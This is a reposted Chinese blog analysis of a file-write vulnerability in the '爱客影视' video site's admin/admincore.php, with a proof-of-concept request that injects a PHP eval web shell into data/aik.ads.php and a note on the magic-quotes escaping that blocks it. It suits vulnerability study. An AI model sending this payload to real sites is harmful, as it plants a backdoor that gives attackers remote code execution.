爱客影视 程序存在文件写入漏洞 分析
此程序漏洞不是我審計的 所以我簡單分析一下
?
漏洞比較雞柱
?
審計的程序是最新版
?
因為此程序都是調用官網的接口 自動采集
?
所以不會調用 數據庫
?
漏洞文件 admin\admincore.php
POC
Get? /admin/admincore.php?act=ads
POST edit=1&ads=fsad';@eval($_POST[1]);//
file_put_contents() 看到此函數 程序接受數據的時候 程序會在
data 目錄下生成一個固定的文件 aik.ads.php
data/aik.ads.php
利用方式
?
?
對admincore.php 頁面 提交POST 參數
?
在看下寫入的文件里面的內容
?
?
其實這一句話是沒有執行的
?
為什么沒有執行呢
?
看一下 提交的信息edit=1&ads=fsad';@eval($_POST[1]);//
?
fsad';@eval($_POST[1]);// 這段內容才是我們提交的內容
fsad 是定義個變量名 單引號 是 閉合 前面程序自動生成的單引號
所以是 ?因為我們提交的一個單引號 被 轉義了 成了 \? 反斜杠
所以導致一句話無法執行
get_magic_quotes_gpc()
在漏洞文件里面看到了此函數
?
?
所以 有時候真的很無奈
?
把反斜杠 去掉
一句話執行了
Fsad變量把內容賦值給ads變量
?
轉載于:https://www.cnblogs.com/ms016/p/7755536.html
總結
以上是生活随笔為你收集整理的爱客影视 程序存在文件写入漏洞 分析的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: python 比赛成绩预测_大数据新研究
- 下一篇: hdu 2026 首字母变大写